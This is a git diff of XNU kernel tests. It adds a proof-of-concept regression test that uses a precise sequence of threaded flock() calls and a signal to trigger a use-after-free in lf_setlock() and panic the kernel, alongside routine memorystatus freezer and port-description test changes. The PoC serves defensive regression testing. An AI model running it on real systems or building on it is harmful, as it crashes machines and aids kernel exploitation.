a/tests/launchd_plists/com.apple.xnu.test.mach_port.plist b/tests/launchd_plists/com.apple.xnu.test.mach_port.plist new file mode 100644 index 000000000..d76f2a53f --- /dev/null +++ b/tests/launchd_plists/com.apple.xnu.test.mach_port.plist @@ -0,0 +1,27 @@ + + + + + MachServices + + com.apple.xnu.test.mach_port + + ResetAtClose + + + + ThrottleInterval + 1 + UserName + root + ProcessType + Adaptive + EnvironmentVariables + + MallocNanoZone + 1 + + LaunchOnlyOnce + + + diff --git a/tests/lockf_uaf_poc/README b/tests/lockf_uaf_poc/README new file mode 100644 index 000000000..0686e71d0 --- /dev/null +++ b/tests/lockf_uaf_poc/README @@ -0,0 +1,5 @@ +This Proof-of-Concept (PoC) is based on code from a security researcher +(see rdar://70587638), and should not be used for any other purpose other +than this test. In particular, this should not be used in other shipping +code or as reference material to create shipping code without first checking +with Apple Legal. diff --git a/tests/lockf_uaf_poc/lockf_uaf_poc_70587638.c b/tests/lockf_uaf_poc/lockf_uaf_poc_70587638.c new file mode 100644 index 000000000..903065675 --- /dev/null +++ b/tests/lockf_uaf_poc/lockf_uaf_poc_70587638.c @@ -0,0 +1,198 @@ +#include +#include +#include +#include +#include +#include +#include + +T_GLOBAL_META( + T_META_NAMESPACE("xnu.ipc"), + T_META_RUN_CONCURRENTLY(TRUE)); + +#define TMP_FILE_NAME "lockf_uaf_poc_70587638" + +static int fd0, fd1, fd2; + +static int other_failure = 0; +static int other_failure_line = 0; + +static pthread_t thr0, thr1, thr2; + +#define RECORD_ERROR(err) do { \ + if (other_failure_line == 0) { \ + other_failure = (err); \ + other_failure_line = __LINE__; \ + } \ +} while (0); +#define MYCHECK_ERRNO(res) do { \ + if ((res) < 0) { \ + RECORD_ERROR((errno)); \ + return NULL; \ + } \ +} while (0) +#define MYCHECK_POSIX(res) do { \ + if ((res) != 0) { \ + RECORD_ERROR((res)); \ + return NULL; \ + } \ +} while (0) + +#define CHECK_OTHER_FAILURE() do { \ + int my_other_failure = other_failure; \ + int my_other_failure_line = other_failure_line; \ + my_other_failure_line = 0; \ + T_QUIET; \ + T_ASSERT_EQ(my_other_failure_line, 0, \ + "Other failure %d at line %d", \ + my_other_failure, my_other_failure_line); \ +} while (0); + +static void * +thr2_func(void *arg) +{ + int res; + + /* + * Wait for thr1 to be blocking on attempting to acquire lock C. See the comment at the top of + * `thr1_func` for the reason why sleep is used. + */ + (void) sleep(1u); + + /* + * Acquire another shared lock (lock D) on the file. At this point the file has acquired 2 + * locks; lock A and D which are both shared locks. It also has 2 exclusive locks currently + * blocking on lock A attempting to be acquired; lock B and C. + */ + res = flock(fd2, LOCK_SH); + MYCHECK_ERRNO(res); + + /* + * Unlock lock A, this will cause the first lock blocking on lock A to be unblocked (lock B) + * and all other locks blocking on it to be moved to blocking on the first blocked lock + * (lock C will now be blocking on lock B). Lock B's thread will be woken up resulting in it + * trying to re-acquire the lock on the file, as lock D is on the same file descriptor and + * already acquired on the file it will be promoted to an exclusive lock and B will be freed + * instead. At this point all locks blocking on lock B (lock C in this case) will now have a + * reference to a freed allocation. + */ + res = flock(fd0, LOCK_UN); + MYCHECK_ERRNO(res); + + return arg; +} + +static void * +thr1_func(void *arg) +{ + int res; + /* + * Wait for thr0 to be blocking on attempting to acquire lock B. Sleeping isn't great because + * it isn't an indication that the thread is blocked but I'm unsure how to detect a blocked + * thread programatically and a 1 second sleep has never failed so far of tests so for now that + * is what is done. + */ + (void) sleep(1u); + + // Another thread is required, spawn it now before blocking + res = pthread_create(&thr2, 0, thr2_func, 0); + MYCHECK_POSIX(res); + + // Block attempting to acquire an exclusive lock - lock C + res = flock(fd1, LOCK_EX); + MYCHECK_ERRNO(res); + + return arg; +} + +static void * +thr0_func(void *arg) +{ + int res; + + // Acquire a shared lock - lock A + res = flock(fd0, LOCK_SH); + MYCHECK_ERRNO(res); + + // Another thread is required, spawn it now before blocking + res = pthread_create(&thr1, 0, thr1_func, 0); + MYCHECK_POSIX(res); + + // Block attempting to acquire an exclusive lock - lock B + res = flock(fd2, LOCK_EX); + MYCHECK_ERRNO(res); + + return arg; +} + +static void +sigpipe_handler(int sig __unused, siginfo_t *sa __unused, void *ign __unused) +{ + return; +} + +T_DECL(lockf_uaf_poc_70587638, + "Do a sequence which caused lf_setlock() to free something still in-use.", + T_META_ASROOT(true), T_META_CHECK_LEAKS(false)) +{ + int res; + struct sigaction sa; + + T_SETUPBEGIN; + + (void) sigfillset(&sa.sa_mask); + sa.sa_sigaction = sigpipe_handler; + sa.sa_flags = SA_SIGINFO; + T_ASSERT_POSIX_SUCCESS(sigaction(SIGPIPE, &sa, NULL), "sigaction(SIGPIPE)"); + + // Setup all the file descriptors needed (fd0's open makes sure the file exists) + T_ASSERT_POSIX_SUCCESS( + fd0 = open(TMP_FILE_NAME, O_RDONLY | O_CREAT, 0666), + "open(\""TMP_FILE_NAME"\", O_RDONLY|O_CREAT, 0666)"); + T_ASSERT_POSIX_SUCCESS( + fd1 = open(TMP_FILE_NAME, O_RDONLY, 0666), + "open(\""TMP_FILE_NAME"\", O_RDONLY, 0666)"); + T_ASSERT_POSIX_SUCCESS( + fd2 = open(TMP_FILE_NAME, 0, 0666), + "open(\""TMP_FILE_NAME"\", O_RDONLY, 0666)"); + T_SETUPEND; + + /* + * Threads are used due to some locks blocking the thread when trying to acquire if a lock that + * blocks the requested lock already exists on the file. By using multiple threads there can be + * multiple locks blocking on attempting to acquire on a file. + */ + res = pthread_create(&thr0, 0, thr0_func, 0); + T_ASSERT_POSIX_ZERO(res, "pthread_create thread 0"); + + /* + * Wait for lock B to be acquired which under the hood actually results in lock D being + * promoted to an exclusive lock and lock B being freed. At this point the bug has been + * triggered leaving lock C with a dangling pointer to lock B. + */ + res = pthread_join(thr0, NULL); + T_ASSERT_POSIX_ZERO(res, "pthread_join thread 0"); + + CHECK_OTHER_FAILURE(); + + // Trigger a signal to wake lock C from sleep causing it to do a UAF access on lock B + res = pthread_kill(thr1, SIGPIPE); + T_ASSERT_POSIX_ZERO(res, "pthread_kill thread 1"); + + CHECK_OTHER_FAILURE(); + + /* + * The kernel should panic at this point. This is just to prevent the + * application exiting before lock C's thread has woken from the signal. + * The application exiting isn't a problem but it will cause all the + * fd to be closed which will cause locks to be unlocked. This + * shouldn't prevent the PoC from working but its just cleaner to + * wait here for the kernel to panic rather than exiting the process. + */ + res = pthread_join(thr1, NULL); + T_ASSERT_POSIX_ZERO(res, "pthread_join thread 1"); + + CHECK_OTHER_FAILURE(); + + T_PASS("lockf_uaf_poc_70587638"); +} diff --git a/tests/memorystatus_freeze_test.c b/tests/memorystatus_freeze_test.c index 0e1e51ad6..eeffaf9ed 100644 --- a/tests/memorystatus_freeze_test.c +++ b/tests/memorystatus_freeze_test.c @@ -1,5 +1,6 @@ #include #include +#include #include #include #include @@ -553,6 +554,7 @@ launch_background_helper(const char* variant) pid_t pid; char **launch_tool_args; char testpath[PATH_MAX]; + char *variant_cpy = strdup(variant); uint32_t testpath_buf_size; int ret; @@ -562,7 +564,7 @@ launch_background_helper(const char* variant) launch_tool_args = (char *[]){ testpath, "-n", - variant, + variant_cpy, NULL }; ret = dt_launch_tool(&pid, launch_tool_args, false, NULL, NULL); @@ -573,6 +575,7 @@ launch_background_helper(const char* variant) /* Set the process's managed bit, so that the kernel treats this process like an app instead of a sysproc. */ ret = memorystatus_control(MEMORYSTATUS_CMD_SET_PROCESS_IS_MANAGED, pid, 1, NULL, 0); T_QUIET; T_ASSERT_POSIX_SUCCESS(ret, "memorystatus_control"); + free(variant_cpy); return pid; } @@ -608,7 +611,7 @@ memorystatus_assertion_test_demote_frozen() /* these values will remain fixed during testing */ int active_limit_mb = 15; /* arbitrary */ int inactive_limit_mb = 7; /* arbitrary */ - int demote_value = 1; + __block int demote_value = 1; /* Launch the child process, and elevate its priority */ int requestedpriority; dispatch_source_t ds_signal, ds_exit; @@ -729,20 +732,20 @@ is_proc_in_frozen_list(pid_t pid, char* name, size_t name_len) } static void -drop_jetsam_snapshot_ownership(void) +unset_testing_pid(void) { int ret; - ret = memorystatus_control(MEMORYSTATUS_CMD_SET_JETSAM_SNAPSHOT_OWNERSHIP, 0, MEMORYSTATUS_FLAGS_SNAPSHOT_DROP_OWNERSHIP, NULL, 0); + ret = memorystatus_control(MEMORYSTATUS_CMD_SET_TESTING_PID, 0, MEMORYSTATUS_FLAGS_UNSET_TESTING_PID, NULL, 0); T_QUIET; T_ASSERT_POSIX_SUCCESS(ret, 0, "Drop ownership of jetsam snapshot"); } static void -take_jetsam_snapshot_ownership(void) +set_testing_pid(void) { int ret; - ret = memorystatus_control(MEMORYSTATUS_CMD_SET_JETSAM_SNAPSHOT_OWNERSHIP, 0, MEMORYSTATUS_FLAGS_SNAPSHOT_TAKE_OWNERSHIP, NULL, 0); + ret = memorystatus_control(MEMORYSTATUS_CMD_SET_TESTING_PID, 0, MEMORYSTATUS_FLAGS_SET_TESTING_PID, NULL, 0); T_QUIET; T_ASSERT_POSIX_SUCCESS(ret, "Take ownership of jetsam snapshot"); - T_ATEND(drop_jetsam_snapshot_ownership); + T_ATEND(unset_testing_pid); } /* @@ -809,6 +812,17 @@ get_jetsam_snapshot_entry(memorystatus_jetsam_snapshot_t *snapshot, pid_t pid) return NULL; } +static dispatch_source_t +run_block_after_signal(int sig, dispatch_block_t block) +{ + dispatch_source_t ds_signal; + signal(sig, SIG_IGN); + ds_signal = dispatch_source_create(DISPATCH_SOURCE_TYPE_SIGNAL, (uintptr_t) sig, 0, dispatch_get_main_queue()); + T_QUIET; T_ASSERT_NOTNULL(ds_signal, "dispatch_source_create"); + dispatch_source_set_event_handler(ds_signal, block); + return ds_signal; +} + /* * Launches the child & runs the given block after the child signals. * If exit_with_child is true, the test will exit when the child exits. @@ -818,11 +832,7 @@ test_after_background_helper_launches(bool exit_with_child, const char* variant, { dispatch_source_t ds_signal, ds_exit; - /* Run the test block after the child launches & signals it's ready. */ - signal(SIGUSR1, SIG_IGN); - ds_signal = dispatch_source_create(DISPATCH_SOURCE_TYPE_SIGNAL, SIGUSR1, 0, dispatch_get_main_queue()); - T_QUIET; T_ASSERT_NOTNULL(ds_signal, "dispatch_source_create"); - dispatch_source_set_event_handler(ds_signal, test_block); + ds_signal = run_block_after_signal(SIGUSR1, test_block); /* Launch the child process. */ child_pid = launch_background_helper(variant); /* Listen for exit. */ @@ -843,7 +853,6 @@ test_after_background_helper_launches(bool exit_with_child, const char* variant, dispatch_activate(ds_exit); } dispatch_activate(ds_signal); - dispatch_main(); } T_DECL(get_frozen_procs, "List processes in the freezer") { @@ -862,6 +871,7 @@ T_DECL(get_frozen_procs, "List processes in the freezer") { T_QUIET; T_ASSERT_POSIX_SUCCESS(kill(child_pid, SIGKILL), "Killed child process"); T_END; }); + dispatch_main(); } T_DECL(frozen_to_swap_accounting, "jetsam snapshot has frozen_to_swap accounting") { @@ -897,11 +907,12 @@ T_DECL(frozen_to_swap_accounting, "jetsam snapshot has frozen_to_swap accounting T_QUIET; T_ASSERT_POSIX_SUCCESS(kill(child_pid, SIGKILL), "Killed child process"); T_END; }); + dispatch_main(); } T_DECL(freezer_snapshot, "App kills are recorded in the freezer snapshot") { /* Take ownership of the snapshot to ensure we don't race with another process trying to consume them. */ - take_jetsam_snapshot_ownership(); + set_testing_pid(); test_after_background_helper_launches(false, "frozen_background", ^{ int ret; @@ -920,11 +931,12 @@ T_DECL(freezer_snapshot, "App kills are recorded in the freezer snapshot") { free(snapshot); T_END; }); + dispatch_main(); } T_DECL(freezer_snapshot_consume, "Freezer snapshot is consumed on read") { /* Take ownership of the snapshot to ensure we don't race with another process trying to consume them. */ - take_jetsam_snapshot_ownership(); + set_testing_pid(); test_after_background_helper_launches(false, "frozen_background", ^{ int ret; @@ -948,12 +960,13 @@ T_DECL(freezer_snapshot_consume, "Freezer snapshot is consumed on read") { free(snapshot); T_END; }); + dispatch_main(); } T_DECL(freezer_snapshot_frozen_state, "Frozen state is recorded in freezer snapshot") { skip_if_freezer_is_disabled(); /* Take ownership of the snapshot to ensure we don't race with another process trying to consume them. */ - take_jetsam_snapshot_ownership(); + set_testing_pid(); test_after_background_helper_launches(false, "frozen_background", ^{ int ret; @@ -975,12 +988,13 @@ T_DECL(freezer_snapshot_frozen_state, "Frozen state is recorded in freezer snaps free(snapshot); T_END; }); + dispatch_main(); } T_DECL(freezer_snapshot_thaw_state, "Thaw count is recorded in freezer snapshot") { skip_if_freezer_is_disabled(); /* Take ownership of the snapshot to ensure we don't race with another process trying to consume them. */ - take_jetsam_snapshot_ownership(); + set_testing_pid(); test_after_background_helper_launches(false, "frozen_background", ^{ int ret; @@ -1017,11 +1031,6 @@ T_HELPER_DECL(check_frozen, "Check frozen state", T_META_ASROOT(true)) { /* Set the process to freezable */ kern_ret = memorystatus_control(MEMORYSTATUS_CMD_SET_PROCESS_IS_FREEZABLE, getpid(), 1, NULL, 0); T_QUIET; T_ASSERT_POSIX_SUCCESS(kern_ret, "set process is freezable"); - /* Signal to our parent that we can be frozen */ - if (kill(getppid(), SIGUSR1) != 0) { - T_LOG("Unable to signal to parent process!"); - exit(SIGNAL_TO_PARENT_FAILED); - } /* We should not be frozen yet. */ is_frozen = memorystatus_control(MEMORYSTATUS_CMD_GET_PROCESS_IS_FROZEN, getpid(), 0, NULL, 0); @@ -1033,9 +1042,6 @@ T_HELPER_DECL(check_frozen, "Check frozen state", T_META_ASROOT(true)) { exit(FROZEN_BIT_SET); } - - sig_t sig_ret = signal(SIGUSR1, SIG_IGN); - T_QUIET; T_WITH_ERRNO; T_ASSERT_NE(sig_ret, SIG_ERR, "signal(SIGUSR1, SIG_IGN)"); ds_signal = dispatch_source_create(DISPATCH_SOURCE_TYPE_SIGNAL, SIGUSR1, 0, dispatch_get_main_queue()); if (ds_signal == NULL) { exit(DISPATCH_SOURCE_CREATE_FAILED); @@ -1055,6 +1061,15 @@ T_HELPER_DECL(check_frozen, "Check frozen state", T_META_ASROOT(true)) { }); dispatch_activate(ds_signal); + sig_t sig_ret = signal(SIGUSR1, SIG_IGN); + T_QUIET; T_WITH_ERRNO; T_ASSERT_NE(sig_ret, SIG_ERR, "signal(SIGUSR1, SIG_IGN)"); + + /* Signal to our parent that we can be frozen */ + if (kill(getppid(), SIGUSR1) != 0) { + T_LOG("Unable to signal to parent process!"); + exit(SIGNAL_TO_PARENT_FAILED); + } + dispatch_main(); } @@ -1074,4 +1089,191 @@ T_DECL(memorystatus_get_process_is_frozen, "MEMORYSTATUS_CMD_GET_PROCESS_IS_FROZ kill(child_pid, SIGUSR1); /* The child will checks its own frozen state & exit. */ }); + dispatch_main(); +} + +static unsigned int freeze_pages_min_old; +static int throttle_enabled_old; +static void cleanup_memorystatus_freeze_top_process() { + sysctlbyname("kern.memorystatus_freeze_pages_min", NULL, NULL, &freeze_pages_min_old, sizeof(freeze_pages_min_old)); + sysctlbyname("kern.memorystatus_freeze_throttle_enabled", NULL, NULL, &throttle_enabled_old, sizeof(throttle_enabled_old)); +} + +#define P_MEMSTAT_FROZEN 0x00000002 +T_DECL(memorystatus_freeze_top_process, "memorystatus_freeze_top_process chooses the correct process", + T_META_ASROOT(true), + T_META_REQUIRES_SYSCTL_EQ("kern.development", 1), + T_META_REQUIRES_SYSCTL_EQ("vm.freeze_enabled", 1)) { + int32_t memorystatus_freeze_band = 0; + size_t memorystatus_freeze_band_size = sizeof(memorystatus_freeze_band); + size_t freeze_pages_min_size = sizeof(freeze_pages_min_old); + unsigned int freeze_pages_min_new = 0; + size_t throttle_enabled_old_size = sizeof(throttle_enabled_old); + int throttle_enabled_new = 1; + __block errno_t ret; + __block int maxproc; + size_t maxproc_size = sizeof(maxproc); + + ret = sysctlbyname("kern.maxproc", &maxproc, &maxproc_size, NULL, 0); + T_QUIET; T_ASSERT_POSIX_SUCCESS(ret, "kern.maxproc"); + sysctlbyname("kern.memorystatus_freeze_jetsam_band", &memorystatus_freeze_band, &memorystatus_freeze_band_size, NULL, 0); + + /* Set min pages to 0 and disable the budget to ensure we can always freeze the child. */ + ret = sysctlbyname("kern.memorystatus_freeze_pages_min", &freeze_pages_min_old, &freeze_pages_min_size, &freeze_pages_min_new, sizeof(freeze_pages_min_new)); + T_QUIET; T_ASSERT_POSIX_SUCCESS(ret, "set kern.memorystatus_freeze_pages_min"); + ret = sysctlbyname("kern.memorystatus_freeze_throttle_enabled", &throttle_enabled_old, &throttle_enabled_old_size, &throttle_enabled_new, sizeof(throttle_enabled_new)); + T_QUIET; T_ASSERT_POSIX_SUCCESS(ret, "set kern.memorystatus_freeze_throttle_enabled"); + T_ATEND(cleanup_memorystatus_freeze_top_process); + /* Take ownership of the freezer probabilities for the duration of the test so that we don't race with dasd. */ + set_testing_pid(); + test_after_background_helper_launches(true, "frozen_background", ^{ + int32_t child_band = JETSAM_PRIORITY_DEFAULT; + /* Place the child in the idle band so that it gets elevated like a typical app. */ + move_to_idle_band(child_pid); + ret = pid_suspend(child_pid); + T_ASSERT_POSIX_SUCCESS(ret, "child suspended"); + + size_t buffer_len = sizeof(memorystatus_properties_entry_v1_t) * (size_t) maxproc; + memorystatus_properties_entry_v1_t *properties_list = malloc(buffer_len); + T_QUIET; T_ASSERT_NOTNULL(properties_list, "malloc properties array"); + size_t properties_list_len = 0; + /* The child needs to age down into the idle band before it's eligible to be frozen. */ + T_LOG("Waiting for child to age into the idle band."); + while (child_band != JETSAM_PRIORITY_IDLE) { + memset(properties_list, 0, buffer_len); + properties_list_len = 0; + memorystatus_jetsam_snapshot_t *snapshot = get_jetsam_snapshot(MEMORYSTATUS_FLAGS_SNAPSHOT_ON_DEMAND, false); + + bool found = false; + for (size_t i = 0; i < snapshot->entry_count; i++) { + memorystatus_jetsam_snapshot_entry_t *snapshot_entry = &snapshot->entries[i]; + if (snapshot_entry->priority <= memorystatus_freeze_band && !snapshot_entry->killed) { + pid_t pid = snapshot_entry->pid; + memorystatus_properties_entry_v1_t *property_entry = &properties_list[properties_list_len++]; + property_entry->version = 1; + property_entry->pid = pid; + if (pid == child_pid) { + found = true; + property_entry->use_probability = 1; + child_band = snapshot_entry->priority; + } else { + property_entry->use_probability = 0; + } + strncpy(property_entry->proc_name, snapshot_entry->name, MAXCOMLEN); + property_entry->proc_name[MAXCOMLEN] = '\0'; + } + } + T_QUIET; T_ASSERT_TRUE(found, "Child is in on demand snapshot"); + free(snapshot); + } + ret = memorystatus_control(MEMORYSTATUS_CMD_GRP_SET_PROPERTIES, 0, MEMORYSTATUS_FLAGS_GRP_SET_PROBABILITY, properties_list, sizeof(memorystatus_properties_entry_v1_t) * properties_list_len); + T_QUIET; T_ASSERT_POSIX_SUCCESS(ret, "MEMORYSTATUS_FLAGS_GRP_SET_PROBABILITY"); + free(properties_list); + int val = 1; + ret = sysctlbyname("vm.memorystatus_freeze_top_process", NULL, NULL, &val, sizeof(val)); + T_ASSERT_POSIX_SUCCESS(ret, "freeze_top_process"); + /* Verify that the process was frozen. */ + memorystatus_jetsam_snapshot_t *snapshot = get_jetsam_snapshot(MEMORYSTATUS_FLAGS_SNAPSHOT_ON_DEMAND, false); + memorystatus_jetsam_snapshot_entry_t *entry = get_jetsam_snapshot_entry(snapshot, child_pid); + T_ASSERT_NOTNULL(entry, "child is in snapshot"); + if (!(entry->state & P_MEMSTAT_FROZEN)) { + T_LOG("Not frozen. Skip reason: %d", entry->jse_freeze_skip_reason); + } + T_ASSERT_TRUE(entry->state & P_MEMSTAT_FROZEN, "child is frozen"); + free(snapshot); + ret = pid_resume(child_pid); + T_ASSERT_POSIX_SUCCESS(ret, "child resumed after freeze"); + + /* Kill the child */ + T_QUIET; T_ASSERT_POSIX_SUCCESS(kill(child_pid, SIGKILL), "Killed child process"); + T_END; + }); + dispatch_main(); +} + +static int +memorystatus_freezer_thaw_percentage(void) +{ + int val; + size_t size = sizeof(val); + int ret = sysctlbyname("kern.memorystatus_freezer_thaw_percentage", &val, &size, NULL, 0); + T_QUIET; T_ASSERT_POSIX_SUCCESS(ret, "failed to query kern.memorystatus_freezer_thaw_percentage"); + return val; +} + +static void +reset_interval(void) +{ + uint32_t freeze_daily_budget_mb = 0; + size_t size = sizeof(freeze_daily_budget_mb); + int ret; + uint64_t new_budget; + ret = sysctlbyname("kern.memorystatus_freeze_daily_mb_max", &freeze_daily_budget_mb, &size, NULL, 0); + T_QUIET; T_ASSERT_POSIX_SUCCESS(ret, "failed to query kern.memorystatus_freeze_daily_mb_max"); + new_budget = (freeze_daily_budget_mb * (1UL << 20) / vm_page_size); + ret = sysctlbyname("kern.memorystatus_freeze_budget_pages_remaining", NULL, NULL, &new_budget, sizeof(new_budget)); + T_QUIET; T_ASSERT_POSIX_SUCCESS(ret, "failed to set kern.memorystatus_freeze_budget_pages_remaining"); +} + +static pid_t second_child; +static void +cleanup_memorystatus_freezer_thaw_percentage(void) +{ + kill(second_child, SIGKILL); +} + +T_DECL(memorystatus_freezer_thaw_percentage, "memorystatus_freezer_thaw_percentage updates correctly", + T_META_ASROOT(true), + T_META_REQUIRES_SYSCTL_EQ("kern.development", 1), + T_META_REQUIRES_SYSCTL_EQ("vm.freeze_enabled", 1)) { + __block dispatch_source_t first_signal_block; + /* Take ownership of the freezer probabilities for the duration of the test so that nothing new gets frozen by dasd. */ + set_testing_pid(); + reset_interval(); + + /* Spawn one child that will remain frozen throughout the whole test & another that will be thawed. */ + first_signal_block = run_block_after_signal(SIGUSR1, ^{ + move_to_idle_band(second_child); + __block int ret = pid_suspend(second_child); + T_QUIET; T_ASSERT_POSIX_SUCCESS(ret, "child suspended"); + freeze_process(second_child); + T_QUIET; T_ASSERT_EQ(memorystatus_freezer_thaw_percentage(), 0, "thaw percentage is still 0 after freeze"); + dispatch_source_cancel(first_signal_block); + test_after_background_helper_launches(true, "frozen_background", ^{ + reset_interval(); + T_QUIET; T_ASSERT_EQ(memorystatus_freezer_thaw_percentage(), 0, "new interval starts with a thaw percentage of 0"); + move_to_idle_band(child_pid); + ret = pid_suspend(child_pid); + T_QUIET; T_ASSERT_POSIX_SUCCESS(ret, "child suspended"); + freeze_process(child_pid); + ret = pid_resume(child_pid); + T_QUIET; T_ASSERT_POSIX_SUCCESS(ret, "child resumed after freeze"); + int percentage_after_thaw = memorystatus_freezer_thaw_percentage(); + T_QUIET; T_ASSERT_GT(percentage_after_thaw, 0, "thaw percentage is higher after thaw"); + + ret = pid_suspend(child_pid); + T_QUIET; T_ASSERT_POSIX_SUCCESS(ret, "child suspended"); + freeze_process(child_pid); + ret = pid_resume(child_pid); + T_QUIET; T_ASSERT_POSIX_SUCCESS(ret, "child resumed after freeze"); + T_QUIET; T_ASSERT_EQ(memorystatus_freezer_thaw_percentage(), percentage_after_thaw, "thaw percentage is unchanged after second thaw"); + + ret = pid_suspend(child_pid); + T_QUIET; T_ASSERT_POSIX_SUCCESS(ret, "child suspended"); + freeze_process(child_pid); + reset_interval(); + T_QUIET; T_ASSERT_EQ(memorystatus_freezer_thaw_percentage(), 0, "new interval starts with a 0 thaw percentage"); + ret = pid_resume(child_pid); + T_QUIET; T_ASSERT_POSIX_SUCCESS(ret, "child resumed after freeze"); + T_QUIET; T_ASSERT_GT(memorystatus_freezer_thaw_percentage(), 0, "thaw percentage goes back up in new interval"); + + T_QUIET; T_ASSERT_POSIX_SUCCESS(kill(child_pid, SIGKILL), "failed to kill child"); + T_END; + }); + }); + + second_child = launch_background_helper("frozen_background"); + T_ATEND(cleanup_memorystatus_freezer_thaw_percentage); + dispatch_activate(first_signal_block); + dispatch_main(); } diff --git a/tests/memorystatus_is_assertion.c b/tests/memorystatus_is_assertion.c index b14feabdd..7574fee55 100644 --- a/tests/memorystatus_is_assertion.c +++ b/tests/memorystatus_is_assertion.c @@ -122,8 +122,8 @@ memorystatus_assertion_test_repetitive(char *test, boolean_t turn_on_dirty_track pid_t mypid = getpid(); /* these values will remain fixed during testing */ - int active_limit_mb = 15; /* arbitrary */ - int inactive_limit_mb = 10; /* arbitrary */ + int active_limit_mb = 35; /* arbitrary */ + int inactive_limit_mb = 25; /* arbitrary */ /* these values may vary during test */ int requestedpriority = 0; @@ -224,8 +224,8 @@ memorystatus_assertion_test_allow_idle_exit() pid_t mypid = getpid(); /* these values will remain fixed during testing */ - int active_limit_mb = 15; /* arbitrary */ - int inactive_limit_mb = 10; /* arbitrary */ + int active_limit_mb = 35; /* arbitrary */ + int inactive_limit_mb = 25; /* arbitrary */ /* these values may vary during test */ int requestedpriority = JETSAM_PRIORITY_UI_SUPPORT; @@ -349,8 +349,8 @@ memorystatus_assertion_test_do_not_allow_idle_exit() pid_t mypid = getpid(); /* these values will remain fixed during testing */ - int active_limit_mb = 15; /* arbitrary */ - int inactive_limit_mb = 10; /* arbitrary */ + int active_limit_mb = 35; /* arbitrary */ + int inactive_limit_mb = 25; /* arbitrary */ int requestedpriority = JETSAM_PRIORITY_AUDIO_AND_ACCESSORY; T_SETUPBEGIN; diff --git a/tests/memorystatus_vm_map_fork.c b/tests/memorystatus_vm_map_fork.c index ff73724cd..65f29b569 100644 --- a/tests/memorystatus_vm_map_fork.c +++ b/tests/memorystatus_vm_map_fork.c @@ -16,6 +16,8 @@ #include #include +#include "test_utils.h" + T_GLOBAL_META( T_META_NAMESPACE("xnu.vm"), T_META_CHECK_LEAKS(false) @@ -77,25 +79,6 @@ static char *child_exit_why[] = { "malloc() failed", }; -/* - * Corpse collection only happens in development kernels. - * So we need this to detect if the test is relevant. - */ -static boolean_t -is_development_kernel(void) -{ - int ret; - int dev = 0; - size_t dev_size = sizeof(dev); - - ret = sysctlbyname("kern.development", &dev, &dev_size, NULL, 0); - if (ret != 0) { - return FALSE; - } - - return dev != 0; -} - /* * Set/Get the sysctl used to determine if corpse collection occurs. * This is done by the kernel checking for a specific PID. diff --git a/tests/perf_vmfault.c b/tests/perf_vmfault.c index db0613f96..9b86fe53f 100644 --- a/tests/perf_vmfault.c +++ b/tests/perf_vmfault.c @@ -8,6 +8,8 @@ #include #include +#include "benchmark/helpers.h" + T_GLOBAL_META( T_META_NAMESPACE("xnu.vm.perf"), T_META_CHECK_LEAKS(false), @@ -74,7 +76,6 @@ static void execute_threads(void); static void *thread_setup(void *arg); static void run_test(int fault_type, int mapping_variant, size_t memsize); static void setup_and_run_test(int test, int threads); -static int get_ncpu(void); /* Allocates memory using the default mmap behavior. Each VM region created is capped at 128 MB. */ static void @@ -410,17 +411,6 @@ setup_and_run_test(int fault_type, int threads) T_END; } -static int -get_ncpu(void) -{ - int ncpu; - size_t length = sizeof(ncpu); - - T_QUIET; T_ASSERT_POSIX_SUCCESS(sysctlbyname("hw.ncpu", &ncpu, &length, NULL, 0), - "failed to query hw.ncpu"); - return ncpu; -} - T_DECL(read_soft_fault, "Read soft faults (single thread)") { diff --git a/tests/port_descriptions.c b/tests/port_descriptions.c index 55d3c12b1..64bbab271 100644 --- a/tests/port_descriptions.c +++ b/tests/port_descriptions.c @@ -76,10 +76,11 @@ T_DECL(host_special_port_descriptions, TEST_HSP(HOST_SYSPOLICYD_PORT); TEST_HSP(HOST_FILECOORDINATIOND_PORT); TEST_HSP(HOST_FAIRPLAYD_PORT); + TEST_HSP(HOST_IOCOMPRESSIONSTATS_PORT); #undef TEST_HSP - T_EXPECT_EQ(HOST_FAIRPLAYD_PORT, HOST_MAX_SPECIAL_PORT, + T_EXPECT_EQ(HOST_IOCOMPRESSIONSTATS_PORT, HOST_MAX_SPECIAL_PORT, "checked all of the ports"); const char *invalid_hsp = @@ -96,6 +97,8 @@ T_DECL(task_special_port_descriptions, portdef, #portdef) TEST_TSP(TASK_KERNEL_PORT); + TEST_TSP(TASK_READ_PORT); + TEST_TSP(TASK_INSPECT_PORT); TEST_TSP(TASK_HOST_PORT); TEST_TSP(TASK_NAME_PORT); TEST_TSP(TASK_BOOTSTRAP_PORT); @@ -115,6 +118,28 @@ T_DECL(task_special_port_descriptions, "invalid task special port description should be NULL"); } +T_DECL(thread_special_port_descriptions, + "verify that thread special ports can be described") +{ +#define TEST_TSP(portdef) \ + expect_special_port_description(mach_thread_special_port_description, \ + portdef, #portdef) + + TEST_TSP(THREAD_KERNEL_PORT); + TEST_TSP(THREAD_READ_PORT); + TEST_TSP(THREAD_INSPECT_PORT); + +#undef TEST_TSP + + T_EXPECT_EQ(THREAD_READ_PORT, THREAD_MAX_SPECIAL_PORT, + "checked all of the ports"); + + const char *invalid_tsp = + mach_thread_special_port_description(THREAD_MAX_SPECIAL_PORT + 1); + T_EXPECT_NULL(invalid_tsp, + "invalid thread special port description should be NULL"); +} + static void expect_special_port_id(int (*fn)(const char *id), int port, const char *portid) { @@ -172,6 +197,8 @@ T_DECL(task_special_port_mapping, portdef, #portdef) TEST_TSP(TASK_KERNEL_PORT); + TEST_TSP(TASK_READ_PORT); + TEST_TSP(TASK_INSPECT_PORT); TEST_TSP(TASK_HOST_PORT); TEST_TSP(TASK_NAME_PORT); TEST_TSP(TASK_BOOTSTRAP_PORT); @@ -186,3 +213,21 @@ T_DECL(task_special_port_mapping, T_EXPECT_EQ(invalid_tsp, -1, "invalid task special port IDs should return -1"); } + +T_DECL(thread_special_port_mapping, + "verify that thread special port names can be mapped to numbers") +{ +#define TEST_TSP(portdef) \ + expect_special_port_id(mach_thread_special_port_for_id, \ + portdef, #portdef) + + TEST_TSP(THREAD_KERNEL_PORT); + TEST_TSP(THREAD_READ_PORT); + TEST_TSP(THREAD_INSPECT_PORT); + +#undef TEST_TSP + + int invalid_tsp = mach_thread_special_port_for_id("BOGUS_SPECIAL_PORT_NAME"); + T_EXPECT_EQ(invalid_tsp, -1, + "invalid thread special port IDs should return -1"); +} diff --git a/tests/preoslog.c b/tests/preoslog.c index e8615016c..9b1b26141 100644 --- a/tests/preoslog.c +++ b/tests/preoslog.c 